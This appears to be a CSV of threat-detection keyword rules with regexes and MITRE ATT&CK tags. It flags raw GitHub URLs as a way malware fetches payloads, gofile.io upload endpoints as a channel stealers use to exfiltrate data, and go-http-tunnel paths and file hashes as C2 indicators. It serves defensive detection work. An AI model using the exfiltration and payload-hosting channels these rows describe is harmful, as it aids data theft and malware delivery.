"*raw.githubusercontent.com*.hta*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.hta.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.iso*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.iso.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.jar*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.jar.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.js*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.js.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.lnk*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.lnk.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.log*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.log.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.mac*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.mac.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.mam*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.mam.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.msi*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.msp*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.msp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.nexe*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.nexe.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.nim*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.nim.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.otm*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.otm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.out*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.out.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.ova*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.ova.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.pem*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pem.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.pfx*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pfx.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.pl*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pl.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.plx*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.plx.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.pm*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.ppk*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.ppk.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.ps1*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.ps1.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.psm1*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.psm1.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.pub*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pub.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.py*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.py.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.pyc*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pyc.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.pyo*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pyo.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.rar*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.rar.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.raw*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.raw.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.reg*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.reg.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.rgs*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.rgs.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.RGS*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.RGS.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.run*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.run.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.scpt*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.scpt.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.script*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.script.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.sct*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.sct.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.sh*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.sh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.ssh*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.ssh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.sys*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.sys.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.teamserver*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.teamserver.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.temp*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.temp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.tgz*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.tgz.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.tmp*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.tmp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.vb*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.vb.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.vbs*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.vbs.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.vbscript*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.vbscript.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.ws*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.ws.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.wsf*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.wsf.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.wsh*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.wsh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.X86*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.X86.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.X86_64*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.X86_64.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.xlam*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.xlam.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.xlm*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.xlm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.xlsm*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.xlsm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.zip*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*.gofile.io/uploadFile*",".{0,1000}\.gofile\.io\/uploadFile.{0,1000}","greyware_tool_keyword","gofile.io","legitimate service abused by lots of stealer to exfiltrate data","T1567.002","TA0010","N/A","N/A","Data Exfiltration","https://gofile.io","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*api.gofile.io/getServer*",".{0,1000}api\.gofile\.io\/getServer.{0,1000}","greyware_tool_keyword","gofile.io","legitimate service abused by lots of stealer to exfiltrate data","T1567.002","TA0010","N/A","N/A","Data Exfiltration","https://gofile.io","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"* tunneld.service*",".{0,1000}\stunneld\.service.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*/.tunneld/*.key*",".{0,1000}\/\.tunneld\/.{0,1000}\.key.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*/go-http-tunnel.git.git*",".{0,1000}\/go\-http\-tunnel\.git\.git.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","1","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*/go-http-tunnel/cmd/*",".{0,1000}\/go\-http\-tunnel\/cmd\/.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","1","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*/tunneld.service*",".{0,1000}\/tunneld\.service.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","1","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*03cbb2a21105c9aae4fb499ad8fb4898d6c87c7d3a3071eae601bdae8bad19ab*",".{0,1000}03cbb2a21105c9aae4fb499ad8fb4898d6c87c7d3a3071eae601bdae8bad19ab.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*0a08cac081d32713c5aaa00b04424dcdf2ffcaa7b58620eebc9ee17b5d25ebbf*",".{0,1000}0a08cac081d32713c5aaa00b04424dcdf2ffcaa7b58620eebc9ee17b5d25ebbf.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*0cba4351414f3da3355bc9ab73052e0d36d6f18e513047650dad956fb6344285*",".{0,1000}0cba4351414f3da3355bc9ab73052e0d36d6f18e513047650dad956fb6344285.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*0faad61745a8c559756165ec4bf749c7ee334b815b750dbdc671af2283805739*",".{0,1000}0faad61745a8c559756165ec4bf749c7ee334b815b750dbdc671af2283805739.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*1433542e6c771cd59c491558e482ebbc7d40bbaf86190379bb4236067b21d805*",".{0,1000}1433542e6c771cd59c491558e482ebbc7d40bbaf86190379bb4236067b21d805.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*14d18d34c262664246cc1eb46dfe1159fce9b5d0b14d6ba013f08d1d55a6eeb6*",".{0,1000}14d18d34c262664246cc1eb46dfe1159fce9b5d0b14d6ba013f08d1d55a6eeb6.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*2c183c4c53ddb0419f401cf690f16ccbeefc829f09fafca2a19700665c322cbc*",".{0,1000}2c183c4c53ddb0419f401cf690f16ccbeefc829f09fafca2a19700665c322cbc.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*341e6c79cb6383b166d0f21f77f88735b340195dce8945bf9ff05a3cda1cb9a0*",".{0,1000}341e6c79cb6383b166d0f21f77f88735b340195dce8945bf9ff05a3cda1cb9a0.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*3daf819f691c66a2216bc047349e5d6ed252aa1393c076cce9f68a1a7bed5b76*",".{0,1000}3daf819f691c66a2216bc047349e5d6ed252aa1393c076cce9f68a1a7bed5b76.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*4416b23c351acb1ea86eff2f75926ee7fbb78dea66fe2f01e38e9f81683645e9*",".{0,1000}4416b23c351acb1ea86eff2f75926ee7fbb78dea66fe2f01e38e9f81683645e9.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*57944ea45f77ef9b4757a95c077b30af638ed72c1399e75356f08cae37a3965f*",".{0,1000}57944ea45f77ef9b4757a95c077b30af638ed72c1399e75356f08cae37a3965f.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*5c4247c201d5bfb98cd4021c4cf0dd732c4fa47daeb4c70fcb29f7ddfe1b5760*",".{0,1000}5c4247c201d5bfb98cd4021c4cf0dd732c4fa47daeb4c70fcb29f7ddfe1b5760.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*616bcf6f1ebc84ce6c2f0469f6c38b08eabef2339dfca03d0782a54ae6cc6024*",".{0,1000}616bcf6f1ebc84ce6c2f0469f6c38b08eabef2339dfca03d0782a54ae6cc6024.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*6794102a7b3d61dd4344b555ab684f4140d40da9ec0da36b03cd397f1987bb61*",".{0,1000}6794102a7b3d61dd4344b555ab684f4140d40da9ec0da36b03cd397f1987bb61.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*690f31d0d8f473ae1f71a7fbce1e7943d601f6adf2065d22d44162266c88f546*",".{0,1000}690f31d0d8f473ae1f71a7fbce1e7943d601f6adf2065d22d44162266c88f546.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*7f23ac69fa3f519b324bcc33e56272bf1cc9191980bef960a562099844659a3c*",".{0,1000}7f23ac69fa3f519b324bcc33e56272bf1cc9191980bef960a562099844659a3c.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*81317db18f63092007326ae6330d704c17d95ff2dfc65fc1922d0f3708ddee6e*",".{0,1000}81317db18f63092007326ae6330d704c17d95ff2dfc65fc1922d0f3708ddee6e.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*873b15cab88f6d288e02bd71e5cefb1edf0b96dc80a8a0d7d404f4b327c68097*",".{0,1000}873b15cab88f6d288e02bd71e5cefb1edf0b96dc80a8a0d7d404f4b327c68097.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*8eb3e6b0ac776c819158b0127631f860223f5fe80cc7297d01626252562cb866*",".{0,1000}8eb3e6b0ac776c819158b0127631f860223f5fe80cc7297d01626252562cb866.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
